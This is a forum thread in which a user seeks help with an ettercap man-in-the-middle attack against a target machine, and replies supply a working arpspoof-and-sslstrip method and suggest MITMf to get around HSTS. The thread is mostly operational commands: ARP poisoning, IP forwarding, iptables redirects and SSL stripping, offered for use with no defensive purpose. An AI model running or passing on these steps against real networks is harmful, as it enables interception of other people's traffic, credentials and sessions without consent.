Hi I need some help performing a MITM attack using ettercap, i can access non https websites on the target machine but when i try access https websites i either get web page cannot be displayed or something about a security certificate not being trusted am i doing anything wrong ? please help me out it would be greatly appreciated, the steps below are the route I've followed and I've also tried the graphical interface of ettercap with no luck
Type In Terminal: kwrite /etc/etter.conf
navigate to ecuid , change the value 65534 to 0
navigate to ecgid , change the value 65534 to 0
remove the # from the If you use iptables
save
Setup IP forwarding on my Kali device by typing:
echo 1 > /proc/sys/net/ipv4/ipforward
and setup port redirection using Iptables:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Start SSLstrip
sslstrip -a -f -l 8080 -w ssl
then start Ettercap
ettercap -T -q -i wlan0 -M arp /ipofthetarget//
6 Responses
The following is a working method I used several times. Change the bold text according to your setup.
> echo 1 > /proc/sys/net/ipv4/ip_forward
> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
> arpspoof -i wlan0 -t TargetIP -r GatewayIP
> sslstrip -l 8080
Try this way (without ettercap) and see if it works.
TRT
Browsers have been updated and now use HSTS which blocks Mitm attacks & sslstrip. You should try mitmf https://github.com/byt3bl33d3r/MITMf it can override HSTS but its still a bit difficult if the target still has cookies from the previous session
This ^
You can find numerous tutorials on this site on how to use it.
thanks for the replies and yeah looks like mitm attacks are pretty much useless now with the HSTS after I looked into it
Well, HSTS definitely makes it more difficult, but not impossible. Please check out Ciuffy's article here .
But this one MITM attack is only for local network?
thanks
Share Your Thoughts